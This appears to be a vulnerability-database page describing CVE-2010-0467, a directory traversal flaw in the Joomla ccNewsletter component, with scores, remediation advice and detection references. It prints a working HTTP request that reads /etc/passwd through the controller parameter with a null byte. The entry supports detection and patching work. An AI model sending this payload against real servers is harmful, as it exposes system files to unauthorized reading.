🔙 목록으로 돌아가기

CVE-2010-0467: Joomla! Component CCNewsLetter - Local File Inclusion

TitleJoomla! Component CCNewsLetter - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
RemediationApply all relevant security patches and upgrades.
CVSS Score5.8
EPSS Score0.02939
CVE IDCVE-2010-0467
CWE IDCWE-22
Tags cve2010 cve joomla lfi edb chillcreations vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.

🌐 HTTP Request

GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.14
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-0467.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-0467.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A